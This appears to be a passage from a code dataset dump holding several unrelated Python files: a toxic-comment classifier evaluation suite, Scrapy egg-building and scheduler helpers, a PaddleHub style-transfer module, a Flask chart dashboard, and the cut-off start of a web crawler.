test_issues[\"self_angry\"] = 0\r\n\r\n test_issues.loc[test_issues.prediction == 1, \"self_angry\"] = test_issues[\r\n test_issues[\"prediction\"] == 1][\"original_text\"].map(\r\n lambda x: self.anger_classifier.classify(self.convert(x)))\r\n\r\n test_issues.loc[test_issues.self_angry == \"self\", \"prediction\"] = 0\r\n\r\n return test_issues\r\n\r\n def remove_SE(self, data, model, thres):\r\n logging.info(\"Removing SE words\")\r\n features = self.features\r\n tf_idf_counter = self.tf_idf_counter\r\n model = model\r\n\r\n p = Pool(num_subproc)\r\n data[\"is_SE\"] = 0\r\n new_pred = p.starmap(remove_SE_comment, [\r\n (data, self.Google, x, model, features, self.max_feature_values, tf_idf_counter)\r\n for x in data.loc[data[\"raw_prediction\"] >= thres].T.to_dict().values()\r\n ])\r\n data.loc[data.raw_prediction >= thres, \"is_SE\"] = new_pred\r\n data.loc[data.raw_prediction >= thres, \"prediction\"] = new_pred\r\n\r\n return data\r\n\r\n def 
classify_test(self):\r\n    return classifiers.classify(self.model, self.train_data, self.test_data,\r\n                                self.features)\r\n\r\n  def classify_test_statistics(self):\r\n    return classify_statistics(self.model, self.train_data, self.test_data,\r\n                               self.features)\r\n\r\n  def set_parameters(self, grid):\r\n    self.param_grid = grid\r\n\r\n  def print_accuracy(self, y, score, raw_score):\r\n    logging.info(\"\\n{}\".format(\r\n        classification_report(y, score)))\r\n    logging.info(\"ROC AUC: {}\".format(roc_auc_score(y, raw_score)))\r\n    fpr, tpr, thresholds = roc_curve(y, raw_score)\r\n    logging.info(\"To plot ROC curve: fpr: {}\".format(\r\n        \",\".join([str(x) for x in fpr])))\r\n    logging.info(\"To plot ROC curve: tpr: {}\".format(\r\n        \",\".join([str(x) for x in tpr])))\r\n    logging.info(\"Thresholds: {}\".format(thresholds))\r\n\r\n\r\n  # training the model on comments\r\n  def self_issue_classification_all(self, model_name, fid, fig,\r\n                                    fig_roc, ax_roc, ax_c_roc,\r\n                                    fig_pr, ax_pr, fig_c_pr, ax_c_pr):\r\n    # n-fold nested cross validation\r\n    # https://scikit-learn.org/stable/auto_examples/model_selection/plot_nested_cross_validation_iris.html\r\n    best_model = None\r\n    best_parameters = {\"n_estimators\": 10, \"max_features\": \"sqrt\", \"max_depth\": 10}\r\n    best_score = 0\r\n    if model_name == \"svm\":\r\n      estimator = SVC()\r\n    elif model_name == \"rf\":\r\n      estimator = RandomForestClassifier()\r\n    elif model_name == \"lg\":\r\n      estimator = LogisticRegression()\r\n    out_f = open(feature_names[fid]+\"_curves.log\", \"w\")\r\n\r\n    # split training and test: GET X_train, X_test, y_train, y_test\r\n    if fid == LOGS_BASED:\r\n      # split training and test\r\n      # split thread_labels\r\n      # shouldn't specify column names here because G has 1 extra than OSS\r\n      tmp_data = self.all_train_data[self.features+[\"thread_id\", \"thread_label\"]]\r\n\r\n      # keep only one data point from each conversation thread\r\n      thread_id_label = tmp_data.drop_duplicates()\r\n      X_train, test_data, y_train, y_test = train_test_split(\r\n          thread_id_label, \r\n          thread_id_label[\"thread_label\"], \r\n          test_size=TEST_SIZE,\r\n          random_state=42)\r\n      test_data[\"label\"] = test_data[\"thread_label\"]\r\n\r\n      # split data into train and test\r\n      X_train = X_train[self.features]\r\n      X_test = test_data[self.features]\r\n    else:\r\n      # split thread_labels\r\n      thread_id_label = self.all_train_data[[\"thread_id\", \"thread_label\"]]\r\n      thread_id_label = thread_id_label.drop_duplicates()\r\n      X_train_id, X_test_id, _, _ = train_test_split(\r\n          thread_id_label, \r\n          thread_id_label[\"thread_label\"], \r\n          test_size=TEST_SIZE,\r\n          random_state=42)\r\n\r\n      # split data into train and test\r\n      X_train_id = X_train_id[\"thread_id\"]\r\n      X_test_id = X_test_id[\"thread_id\"]\r\n      train_data = self.all_train_data.loc[self.all_train_data[\"thread_id\"].isin(X_train_id)]\r\n      test_data = self.all_train_data.loc[self.all_train_data[\"thread_id\"].isin(X_test_id)]\r\n\r\n      X_train = train_data[self.features]\r\n      y_train = train_data[\"label\"]\r\n      X_test = test_data[self.features]\r\n      y_test = test_data[\"label\"]\r\n\r\n\r\n    # thread-level labels\r\n    label_data = test_data[[\"thread_id\", \"thread_label\"]]\r\n    true_thread_label = label_data.groupby(\"thread_id\").first()\r\n    true_thread_label = true_thread_label.reset_index()\r\n    true_thread_label = true_thread_label[\"thread_label\"]\r\n\r\n    # for plotting\r\n    if fid == 0:\r\n      color = \"g\"\r\n    elif fid == 1:\r\n      color = \"b\"\r\n    else:\r\n      color = \"r\"\r\n\r\n    # some scores for t-tests\r\n    train_scores = []\r\n    
test_comment_scores = []\r\n    test_thread_scores = []\r\n    auc_comment_scores = []\r\n    auc_thread_scores = []\r\n    pr_auc_thread_scores = []\r\n    pr_auc_comment_scores = []\r\n\r\n    all_tprs = []\r\n    all_fprs = []\r\n    all_ps = []\r\n    all_rs = []\r\n\r\n    # do training NUM_TRIALS times\r\n    for i in range(NUM_TRIALS):\r\n      # find the best parameter combination\r\n      model = GridSearchCV(\r\n          estimator=estimator,\r\n          param_grid=self.param_grid,\r\n          scoring=\"f1\",\r\n          n_jobs=num_subproc, # parallel\r\n          cv=StratifiedKFold(n_splits=N_SPLITS, shuffle=True),\r\n          verbose=0)\r\n      model.fit(X_train, y_train)\r\n\r\n      # nested cross validation with parameter optimization\r\n      nested_score = cross_val_score(\r\n          model,\r\n          X_train,\r\n          y_train,\r\n          scoring=\"f1\",\r\n          cv=StratifiedKFold(n_splits=N_SPLITS, shuffle=True))\r\n      nested_scores = nested_score.mean()\r\n      if nested_scores > best_score:\r\n        best_score = nested_scores\r\n        # find the hyperparameters associated with the highest f1 training score\r\n        best_parameters = dict(model.best_params_)\r\n      train_scores.append(nested_scores)\r\n\r\n      # The optimal parameters\r\n      logging.info(\"Tried all combinations of hyper parameters.\")\r\n      logging.info(\"Scores with {}x{} nested cross validation\".format(\r\n          NUM_TRIALS,\r\n          N_SPLITS))\r\n      logging.info(\"Best parameter: {}.\".format(best_parameters))\r\n      logging.info(\"Best score: {}.\".format(best_score))\r\n\r\n      # test how the current model works\r\n      # test for bootstrapping\r\n      pred_prob = model.predict_proba(test_data[self.features])\r\n      test_data[\"raw_prediction\"] = [pp[1] for pp in pred_prob]\r\n      test_data[\"prediction\"] = test_data[\"raw_prediction\"]\r\n\r\n      if fid == LOGS_BASED:\r\n        test_data[\"label\"] = test_data[\"thread_label\"]\r\n\r\n      # record before SE adjustment\r\n      # for Logs-based, it should be the same..b/c no SE adjust\r\n      [_, _, _, _, _, best_thres, _, _] = self.get_all_curves(\r\n          test_data[\"label\"], \r\n          test_data[\"raw_prediction\"],\r\n          fid,\r\n          \"before SE adjustment\",\r\n          out_f)\r\n      # get F1 score on thread-level\r\n      if fid != LOGS_BASED:\r\n        # remove SE words\r\n        #logging.info(\"Removing SE words.\")\r\n        # tentatively assign each data point to a class based on the best\r\n        # threshold using raw predictions\r\n        #assign_class = lambda x:int(x>=best_thres)\r\n        #test_data[\"prediction\"] = test_data[\"prediction\"].map(assign_class)\r\n\r\n        precision, recall, thresholds = precision_recall_curve(\r\n            test_data[\"label\"],\r\n            test_data[\"raw_prediction\"])\r\n\r\n\r\n        tprs = []\r\n        fprs = []\r\n        f1s = []\r\n        precisions = []\r\n        recalls = []\r\n\r\n        thresholds = np.linspace(thresholds[0], thresholds[-1], 50)\r\n        #test_data = self.remove_SE(test_data, model, 0.5)\r\n        best_pr_auc = 0\r\n        for threshold in thresholds:\r\n          # for each comment threshold, aggregate thread prediction, get TPR, FPR\r\n          label_data = test_data[[\"thread_id\", \"prediction\"]]\r\n          label_data[\"prediction\"] = label_data[\"prediction\"].map(lambda x:x>threshold)\r\n          predicted_threads = label_data.groupby(\"thread_id\")[\"prediction\"].sum()\r\n          predicted_threads = predicted_threads.reset_index()\r\n          predicted_threads[\"thread_prediction\"] = \\\r\n              predicted_threads[\"prediction\"].map(lambda x: int(x>0))\r\n          predicted_thread_label = predicted_threads[\"thread_prediction\"]\r\n\r\n          f1s.append(f1_score(true_thread_label.tolist(),\r\n              predicted_thread_label.tolist()))\r\n\r\n          tp = sum([(p==True and t==True) for (p, t) in zip(predicted_thread_label,\r\n              true_thread_label)])\r\n          fn = sum([(p==False and t==True) for (p, t) in 
zip(predicted_thread_label, \r\n              true_thread_label)])\r\n          fp = sum([(p==True and t==False) for (p, t) in zip(predicted_thread_label, \r\n              true_thread_label)])\r\n          tn = sum([(p==False and t==False) for (p, t) in zip(predicted_thread_label, \r\n              true_thread_label)])\r\n          tprs.append(tp/(tp+fn))\r\n          fprs.append(fp/(tn+fp))\r\n          cur_recall = tp/(tp+fn)\r\n          recalls.append(tp/(tp+fn))\r\n          if tp+fp == 0:\r\n            precisions.append(0)\r\n          else:\r\n            precisions.append(tp/(tp+fp))\r\n\r\n        best_thres = thresholds[np.argmax(f1s)]\r\n        if i == 0: # first trial\r\n          ax_roc.plot(fprs, tprs, color=color, linewidth=0.5,\r\n              label=feature_names[fid]+\" thread-level\")\r\n          ax_pr.plot(recalls, precisions, color=color, linewidth=0.5,\r\n              label=feature_names[fid]+\" thread-level\")\r\n        else:\r\n          ax_roc.plot(fprs, tprs, color=color, linewidth=0.5)\r\n          ax_pr.plot(recalls, precisions, color=color, linewidth=0.5)\r\n        cur_pr_auc = auc(recalls, precisions)\r\n        if cur_pr_auc > best_pr_auc:\r\n          best_pr_auc = cur_pr_auc\r\n\r\n        out_f.write(\"thread level precisions:{}\".format(str(precisions)))\r\n        out_f.write(\"thread level recalls:{}\".format(str(recalls)))\r\n        logging.info(\"thread level AUC PR:{}\".format(best_pr_auc))\r\n        pr_auc_thread_scores.append(best_pr_auc)\r\n\r\n        out_f.write(\"thread level tprs:{}\".format(str(tprs)))\r\n        out_f.write(\"thread level fprs:{}\".format(str(fprs)))\r\n        out_f.write(\"f1s: {}\".format(str(f1s)))\r\n        test_thread_scores.append(max(f1s))\r\n        auc_thread_scores.append(auc(fprs, tprs))\r\n        out_f.write(\"thread level ROC AUC: {}\".format(\r\n \t\t\t\tauc(fprs, tprs)))\r\n\r\n        all_fprs.append(list(fprs))\r\n        all_tprs.append(list(tprs))\r\n        all_ps.append(list(precisions))\r\n        all_rs.append(list(recalls))\r\n        \r\n\r\n\r\n      # COMMENTS, use the threshold that yields the best thread-level\r\n      # performance\r\n      # currently, predictions are all probabilities\r\n      # for non-changed data, it was assigned to be the same as prev raw_pred\r\n      # for changed ones, it is the new proba given new features\r\n      # convert to binary class\r\n      #test_data = self.remove_SE(test_data, model, best_thres)\r\n\r\n      logging.info(\"Crossvalidation score for comments after adjustment\")\r\n      logging.info(\"{}\".format(classification_report(\r\n          test_data[\"label\"],\r\n          test_data[\"prediction\"].map(lambda x:x>=best_thres))))\r\n\r\n      logging.info(\"Number of 1's in raw prediction: {}.\".format(\r\n          sum([tt > 0 for tt in test_data[\"raw_prediction\"]])))\r\n      try:\r\n        logging.info(\"Number of data flipped due to SE: {}.\".format(\r\n            len(test_data.loc[test_data[\"is_SE\"] > 0])))\r\n        #logging.info(\"Number of data flipped due to self angry: {}.\".format(\r\n        #    len(test_data.loc[test_data[\"self_angry\"] == \"self\"])))\r\n      except:\r\n        pass\r\n\r\n      [recall, precision, fpr, tpr, cur_auc, best_thres, best_f1, cur_pr_auc] = self.get_all_curves(\r\n          test_data[\"label\"],\r\n          test_data[\"prediction\"].tolist(),\r\n          fid,\r\n          \"after SE adjustment comment-level\",\r\n          out_f)\r\n      if i == 0: # first trial\r\n        ax_c_pr.plot(recall, precision, color=color, linewidth=0.5, \r\n            label=feature_names[fid]+\" comment-level\")\r\n        ax_c_roc.plot(fpr, tpr, color=color, linewidth=0.5,\r\n            label=feature_names[fid]+\" comment-level\")\r\n      else:\r\n        ax_c_pr.plot(recall, precision, color=color, linewidth=0.5)\r\n        ax_c_roc.plot(fpr, tpr, color=color, linewidth=0.5)\r\n      auc_comment_scores.append(cur_auc)\r\n      test_comment_scores.append(best_f1)\r\n      pr_auc_comment_scores.append(cur_pr_auc)\r\n\r\n      else: # LOGS_BASED\r\n      # 
find the thres that yields the best F1 score to assign comments to a\r\n # class\r\n precision, recall, thresholds = precision_recall_curve(\r\n test_data[\"thread_label\"], \r\n test_data[\"raw_prediction\"])\r\n\r\n f1_scores = 2*recall*precision/(recall+precision)\r\n best_thres = thresholds[np.argmax(f1_scores)]\r\n test_data[\"prediction\"] = test_data[\"raw_prediction\"]#.map(lambda x:x>=best_thres)\r\n\r\n # these two should be the same, just as a sanity check\r\n test_comment_scores.append(max(f1_scores))\r\n test_thread_scores.append(f1_score(\r\n test_data[\"thread_label\"],\r\n test_data[\"prediction\"].map(lambda x:x>=best_thres)))\r\n\r\n [recall, precision, fpr, tpr, cur_auc, _, _, cur_pr_auc] = self.get_all_curves(\r\n test_data[\"thread_label\"],\r\n test_data[\"prediction\"],\r\n fid,\r\n \"Logs-based thread-level\",\r\n out_f)\r\n auc_comment_scores.append(cur_auc)\r\n auc_thread_scores.append(cur_auc)\r\n pr_auc_comment_scores.append(cur_pr_auc)\r\n pr_auc_thread_scores.append(cur_pr_auc)\r\n all_fprs.append(list(fpr))\r\n all_tprs.append(list(tpr))\r\n all_ps.append(list(precision))\r\n all_rs.append(list(recall))\r\n\r\n if i == 0: # first trial\r\n ax_c_pr.plot(recall, precision, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n ax_pr.plot(recall, precision, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n ax_c_roc.plot(fpr, tpr, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n ax_roc.plot(fpr, tpr, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n else:\r\n ax_c_pr.plot(recall, precision, color=color, linewidth=0.5)\r\n ax_pr.plot(recall, precision, color=color, linewidth=0.5)\r\n ax_c_roc.plot(fpr, tpr, color=color, linewidth=0.5)\r\n ax_roc.plot(fpr, tpr, color=color, linewidth=0.5)\r\n\r\n ax_roc.legend()\r\n ax_c_roc.legend()\r\n ax_c_pr.legend()\r\n ax_pr.legend()\r\n fig.savefig(\"G_ROC_threads_no_SE_\"+now+\"_\"+feature_names[fid]+\".pdf\")\r\n fig_roc.savefig(\"G_ROC_comments_no_SE_\"+now+\"_\"+feature_names[fid]+\".pdf\")\r\n fig_pr.savefig(\"G_PR_threads_no_SE_\"+now+\"_\"+feature_names[fid]+\".pdf\")\r\n fig_c_pr.savefig(\"G_PR_comments_no_SE_\"+now+\"_\"+feature_names[fid]+\".pdf\")\r\n\r\n # use the best combination of hyperparameters\r\n clf = RandomForestClassifier(\r\n n_estimators = best_parameters[\"n_estimators\"],\r\n max_depth = best_parameters[\"max_depth\"],\r\n max_features = best_parameters[\"max_features\"]\r\n )\r\n clf.fit(X_train, y_train)\r\n self.model = clf\r\n logging.info(\"importance on train set\\n\")\r\n logging.info(\"For plotting feature importance\")\r\n fea_importance = clf.feature_importances_\r\n for col_ind, coll in enumerate(X_train.columns):\r\n logging.info(\"{},{}\".format(coll, fea_importance[col_ind]))\r\n\r\n # save the model\r\n model_out = open(\r\n \"src/pickles/{}_model_1.p\".format(model_name.upper()),\r\n \"wb\")\r\n pickle.dump(clf, model_out)\r\n model_out.close()\r\n logging.info(\"Model is stored at {}.\".format(\r\n str(pathlib.Path(__file__).parent.name) + \"/src/pickles/\"))\r\n\r\n logging.info(\"Feature set {}: score: {}\".format(fid, train_scores))\r\n logging.info(\"train scores: {}\".format(str(train_scores)))\r\n logging.info(\"test scores: {}\".format(str(test_comment_scores)))\r\n logging.info(\"test thread scores: {}\".format(str(test_thread_scores)))\r\n logging.info(\"test AUC comment scores: {}\".format(\r\n str(auc_comment_scores)))\r\n logging.info(\"test AUC thread 
scores: {}\".format(\r\n str(auc_thread_scores)))\r\n logging.info(\"test PR AUC comment scores: {}\".format(\r\n str(pr_auc_comment_scores)))\r\n logging.info(\"test PR AUC thread scores: {}\".format(\r\n str(pr_auc_thread_scores)))\r\n logging.info(\"test AUC thread scores: {}\".format(\r\n str(auc_thread_scores)))\r\n\r\n logging.info(\"END CLASSIFIER {}\\n\\n\\n\".format(feature_names[fid]))\r\n\r\n # save the ROC curve\r\n #ax.legend()\r\n #ax_c.legend()\r\n #fig.savefig(\"G_precision-recall_curve_\"+str(fid)+\".pdf\")\r\n out_f.write(\"{} all fprs:{}\\n\".format(feature_names[fid], all_fprs))\r\n out_f.write(\"{} all tprs:{}\\n\".format(feature_names[fid], all_tprs))\r\n out_f.write(\"{} all ps:{}\\n\".format(feature_names[fid], all_ps))\r\n out_f.write(\"{} all rs:{}\\n\".format(feature_names[fid], all_rs))\r\n\r\n out_f.close()\r\n return [train_scores, test_comment_scores, test_thread_scores,\r\n auc_comment_scores, auc_thread_scores]\r\n\r\n\r\n def get_all_curves(self, y_true, y_pred, fid, stage, out_f): \r\n precision, recall, thresholds = precision_recall_curve(\r\n y_true, \r\n y_pred)\r\n logging.info(feature_names[fid])\r\n # use the raw prediction to get a F1 score\r\n f1_scores = 2*recall*precision/(recall+precision)\r\n best_thres_ind = np.argmax(f1_scores)\r\n best_thres = thresholds[best_thres_ind]\r\n out_f.write(\"\\n{}, \\nP:{}, \\nR:{}, \\nT:{}\\n\".format(\r\n stage,\r\n \",\".join([str(p) for p in precision]),\r\n \",\".join([str(p) for p in recall]),\r\n \",\".join([str(p) for p in thresholds])))\r\n out_f.write(\"{}, AUC PR curves:{}\\n\".format(\r\n stage,\r\n str(auc(recall, precision))))\r\n out_f.write(\"best thres:{}, \\nF1s: {} \\jbest F1:{}\\n\".format(\r\n best_thres,\r\n \",\".join([str(f) for f in f1_scores]),\r\n max(f1_scores)))\r\n\r\n [fpr, tpr, thresholds_tf] = roc_curve(\r\n y_true,\r\n y_pred)\r\n out_f.write(\"\\n{}: \\nfpr:{}\\ntpr:{}\\nT:{}\\n\".format(\r\n stage,\r\n str(fpr),\r\n str(tpr),\r\n str(thresholds_tf)))\r\n\r\n cur_auc = roc_auc_score(\r\n y_true,\r\n y_pred)\r\n out_f.write(\"ROC AUC {}: {}\".format(stage, str(cur_auc)))\r\n\r\n out_f.write(\r\n \"tprs: {}\\nfprs: {}\\nthresholds: {}\".format(str(tpr), str(fpr),\r\n str(thresholds_tf)))\r\n return [recall, precision, fpr, tpr, cur_auc, best_thres, max(f1_scores),\r\n auc(recall, precision)]\r\n\r\n\r\n # applying the model to the test data\r\n def test_issue_classifications_from_comments_all(self, matched_pairs=False):\r\n X_test = self.test_data[self.features]\r\n\r\n self.test_data[\"raw_prediction\"] = self.model.predict(X_test)\r\n self.test_data[\"prediction\"] = self.test_data[\"raw_prediction\"]\r\n #if \"perspective_score\" in self.features:\r\n #self.test_data = self.remove_I(self.test_data)\r\n #self.test_data = self.remove_SE(self.test_data, self.model)\r\n return self.test_data\r\n","sub_path":"src/suite.py","file_name":"suite.py","file_ext":"py","file_size_in_byte":31528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"92631813","text":"#! 
/usr/bin/env python\n#-*-coding:utf-8 -*-\n\nimport glob\nimport os\nimport time\nimport shutil\nimport sys\nimport tempfile\nimport redis\nimport json\nimport logging\nfrom os.path import join\nfrom subprocess import check_call\n\nimport configparser\nfrom common.FormatStr import dictRemoveNone\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom scrapy.utils.python import retry_on_eintr\nfrom common.OperationOfDB import executeTheSQLStatement\nfrom models.Boss.Area import Area as DataArea, tableChangeDic\nfrom models.Boss.SpiderScriptNode import SpiderScriptNode, tableChangeDic\nfrom models.Boss.SpiderSchedule import SpiderSchedule,tableChangeDic\nfrom models.Boss.SpiderScript import SpiderScript, tableChangeDic\nfrom models.Boss.SpiderScriptSchedule import SpiderScriptSchedule, tableChangeDic\nfrom config import PROJECTS_FOLDER,redisHost,redisPort,redisTaskDb\nfrom apscheduler.jobstores.redis import RedisJobStore\nfrom apscheduler.executors.pool import ThreadPoolExecutor, ProcessPoolExecutor\n\n\njobstores = {\n    'redis': RedisJobStore(host=redisHost,port=redisPort,db=redisTaskDb)\n}\nexecutors = {\n    'default': ThreadPoolExecutor(10),# default number of threads\n    'processpool': ProcessPoolExecutor(3)# default number of processes\n}\n\nschedul = BackgroundScheduler(jobstores=jobstores, executors=executors)\n\n\ndef scrapyd_url(ip, port):\n    \"\"\"\n    get scrapyd url\n    :param ip: host\n    :param port: port\n    :return: string\n    \"\"\"\n    url = 'http://{ip}:{port}'.format(ip=ip, port=port)\n    return url\n\n\ndef log_url(ip, port, project, spider, job):\n    \"\"\"\n    get log url\n    :param ip: host\n    :param port: port\n    :param project: project\n    :param spider: spider\n    :param job: job\n    :return: string\n    \"\"\"\n    url = 'http://{ip}:{port}/logs/{project}/{spider}/{job}.log'.format(ip=ip, port=port, project=project,\n                                                                       spider=spider, job=job)\n    return url\n\n\n\ndef config(path, section, option, name='scrapy.cfg', default=None):\n    try:\n        cf = configparser.ConfigParser()\n        cfg_path = join(path, name)\n        cf.read(cfg_path)\n        return cf.get(section, option)\n    except configparser.NoOptionError:\n        return default\n\n\ndef build_project(project):\n    egg = build_egg(project)\n    print('Built %(project)s into %(egg)s' % {'egg': egg, 'project': project})\n    return egg\n\n\n_SETUP_PY_TEMPLATE = \\\n    \"\"\"# Automatically created by: gerapy\nfrom setuptools import setup, find_packages\nsetup(\n    name='%(project)s',\n    version='1.0',\n    packages=find_packages(),\n    entry_points={'scrapy':['settings=%(settings)s']},\n)\"\"\"\n\n\n\n# build the egg\ndef build_egg(project):\n    work_path = os.getcwd()\n    try:\n        path = os.path.abspath(join(os.getcwd(), PROJECTS_FOLDER))\n        project_path = join(path, project)\n        os.chdir(project_path)\n        settings = config(project_path, 'settings', 'default')\n        create_default_setup_py(project_path, settings=settings, project=project)\n        d = tempfile.mkdtemp(prefix=\"zzh-\")\n        o = open(os.path.join(d, \"stdout\"), \"wb\")\n        e = open(os.path.join(d, \"stderr\"), \"wb\")\n        retry_on_eintr(check_call, [sys.executable, 'setup.py', 'clean', '-a', 'bdist_egg', '-d', d],\n                       stdout=o, stderr=e)\n        o.close()\n        e.close()\n        egg = glob.glob(os.path.join(d, '*.egg'))[0]\n        # Delete Origin file\n        if find_egg(project_path):\n            os.remove(join(project_path, find_egg(project_path)))\n        shutil.move(egg, project_path)\n        return join(project_path, find_egg(project_path))\n    except Exception as e:\n        print(e.args)\n    finally:\n        os.chdir(work_path)\n\n\ndef 
find_egg(path):\n    items = os.listdir(path)\n    for name in items:\n        if name.endswith(\".egg\"):\n            return name\n    return None\n\n\ndef create_default_setup_py(path, **kwargs):\n    with open(join(path, 'setup.py'), 'w') as f:\n        print(kwargs)\n        file = _SETUP_PY_TEMPLATE % kwargs\n        f.write(file)\n        f.close()\n\n\n","sub_path":"boss_service/common/SpiderUtils.py","file_name":"SpiderUtils.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"336389023","text":"import os\n\nfrom paddlehub import Module\nfrom paddlehub.module.module import moduleinfo, serving\n\nfrom UGATIT_83w.model import Model\nfrom UGATIT_83w.processor import base64_to_cv2, cv2_to_base64, Processor\n\n\n@moduleinfo(\n    name=\"UGATIT_83w\",  # model name\n    type=\"CV/style_transfer\",  # model type\n    author=\"jm12138\",  # author name\n    author_email=\"jm12138@qq.com\",  # author email\n    summary=\"UGATIT\",  # model description\n    version=\"1.0.1\"  # version number\n)\nclass UGATIT_83w(Module):\n    # initialization\n    def __init__(self, name=None, use_gpu=False):\n        # set the model path\n        self.model_path = os.path.join(self.directory, \"UGATIT_83w\")\n\n        # load the model\n        self.model = Model(modelpath=self.model_path, use_gpu=use_gpu, use_mkldnn=False, combined=False)\n\n    # keypoint detection function\n    def style_transfer(self, images=None, paths=None, batch_size=1, output_dir='output', visualization=False):\n        # load the data processor\n        processor = Processor(images, paths, output_dir, batch_size)\n\n        # model prediction\n        outputs = self.model.predict(processor.input_datas)\n\n        # postprocess the results\n        results = processor.postprocess(outputs, visualization)\n\n        # return the results\n        return results\n\n    # Hub Serving\n    @serving\n    def serving_method(self, images, **kwargs):\n        # get the input data\n        images_decode = [base64_to_cv2(image) for image in images]\n\n        # image style transfer\n        results = self.style_transfer(images_decode, **kwargs)\n\n        # encode the output images\n        encodes = []\n        for result in results:\n            encode = cv2_to_base64(result)\n            encodes.append(encode)\n\n        # return the results\n        return encodes\n","sub_path":"modules/image/Image_gan/style_transfer/UGATIT_83w/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"491261598","text":"from flask import Flask, jsonify, request\nfrom flask import render_template\nimport ast\n\napp = Flask(__name__)\n\nlabels0 = []\nvalues0 = []\nlabels1 = []\nvalues1 = []\nlabels2 = []\nvalues2_1 = []\nvalues2_2 = []\nlabels3 = []\nvalues3 = []\nlabels4 = []\nvalues4 = []\nlabels5 = []\nvalues5 = []\n\n\n@app.route(\"/\")\ndef get_chart_page():\n    global labels0, values0, labels1, values1, labels2, values2_1, values2_2, \\\n        labels3, values3, labels4, values4, labels5, values5\n    labels0 = []\n    values0 = []\n    labels1 = []\n    values1 = []\n    labels2 = []\n    values2_1 = []\n    values2_2 = []\n    labels3 = []\n    values3 = []\n    labels4 = []\n    values4 = []\n    labels5 = []\n    values5 = []\n    return render_template('index.html',\n                           labels0=labels0, values0=values0,\n                           labels1=labels1, values1=values1,\n                           labels2=labels2,\n                           values2_1=values2_1, values2_2=values2_2,\n                           labels3=labels3, values3=values3,\n                           labels4=labels4, values4=values4,\n                           labels5=labels5, values5=values5)\n\n\n@app.route('/refreshData')\ndef refresh_graph_data():\n    global labels0, values0, labels1, values1, labels2, values2_1, values2_2, \\\n        labels3, values3, labels4, values4, labels5, values5\n    print(\"Labels0 now: \" + str(labels0))\n    print(\"Values0 now: \" + str(values0))\n    print(\"Labels1 now: \" + str(labels1))\n    print(\"Values1 now: \" + 
str(values1))\n print(\"Labels2 now: \" + str(labels2))\n print(\"Values2_1 now: \" + str(values2_1))\n print(\"Values2_2 now: \" + str(values2_2))\n print(\"Labels3 now: \" + str(labels3))\n print(\"Values3 now: \" + str(values3))\n print(\"Labels4 now: \" + str(labels4))\n print(\"Values4 now: \" + str(values4))\n print(\"Labels5 now: \" + str(labels5))\n print(\"Values5 now: \" + str(values5))\n return jsonify(labels0=labels0, values0=values0,\n labels1=labels1, values1=values1,\n labels2=labels2,\n values2_1=values2_1, values2_2=values2_2,\n labels3=labels3, values3=values3,\n labels4=labels4, values4=values4,\n labels5=labels5, values5=values5)\n\n\n@app.route('/updateData', methods=['POST'])\ndef update_data():\n global labels0, values0, labels1, values1, labels2, values2_1, values2_2, \\\n labels3, values3, labels4, values4, labels5, values5\n if 'values0' in str(request.form):\n labels0 = ast.literal_eval(request.form['labels0'])\n values0 = ast.literal_eval(request.form['values0'])\n if 'values1' in str(request.form):\n labels1 = ast.literal_eval(request.form['labels1'])\n values1 = ast.literal_eval(request.form['values1'])\n elif 'values2_1' in str(request.form):\n labels2 = ast.literal_eval(request.form['labels2'])\n values2_1 = ast.literal_eval(request.form['values2_1'])\n elif 'values2_2' in str(request.form):\n labels2 = ast.literal_eval(request.form['labels2'])\n values2_2 = ast.literal_eval(request.form['values2_2'])\n elif 'values3' in str(request.form):\n labels3 = ast.literal_eval(request.form['labels3'])\n values3 = ast.literal_eval(request.form['values3'])\n elif 'values4' in str(request.form):\n labels4 = ast.literal_eval(request.form['labels4'])\n values4 = ast.literal_eval(request.form['values4'])\n elif 'values5' in str(request.form):\n labels5 = ast.literal_eval(request.form['labels5'])\n values5 = ast.literal_eval(request.form['values5'])\n else:\n return \"error\", 400\n print(\"Labels0 Received: \" + str(labels0))\n print(\"Values0 Received: \" + str(values0))\n print(\"Labels1 Received: \" + str(labels1))\n print(\"Values1 Received: \" + str(values1))\n print(\"Labels2 Received: \" + str(labels2))\n print(\"Values2_1 Received: \" + str(values2_1))\n print(\"Values2_2 Received: \" + str(values2_2))\n print(\"Labels3 Received: \" + str(labels3))\n print(\"Values3 Received: \" + str(values3))\n print(\"Labels4 Received: \" + str(labels4))\n print(\"Values4 Received: \" + str(values4))\n print(\"Labels5 Received: \" + str(labels5))\n print(\"Values5 Received: \" + str(values5))\n return \"success\", 201\n\n\nif __name__ == \"__main__\":\n app.run(host='localhost', port=5001)\n","sub_path":"dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449737353","text":"#! 
/usr/bin/env python\n#coding: utf-8\n\nimport re\nimport optparse\nimport sqlite3\nimport socket\nimport logging\nimport urllib2, urlparse\nfrom Queue import Queue, Empty\nfrom threading import Thread, Lock\nfrom httplib import BadStatusLine\nfrom bs4 import BeautifulSoup\n\nvisited_links = []\nqueue = Queue()\ndb_queue = Queue()\n\ndef fetchPage(deep, url, log):\n    '''Fetch the HTML source of the given URL '''\n    if not url.startswith('http://') and not url.startswith('https://'):\n        url = 'http://'+url\n\n    log.info(u\"Fetching HTML source: (%d)%s\" % (deep, url))\n    headers = {\n        'Referer':'http://www.cnbeta.com/articles',\n        'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'\n    }\n    log.debug(u'Setting request headers: (%d)%s' %(deep, url))\n    req = urllib2.Request(url, headers = headers)\n\n    log.debug(u'Downloading page: (%d)%s' %(deep, url))\n    try:\n        response = urllib2.urlopen(req, timeout=20)\n    except urllib2.URLError as e:\n        if hasattr(e, 'reason'):\n            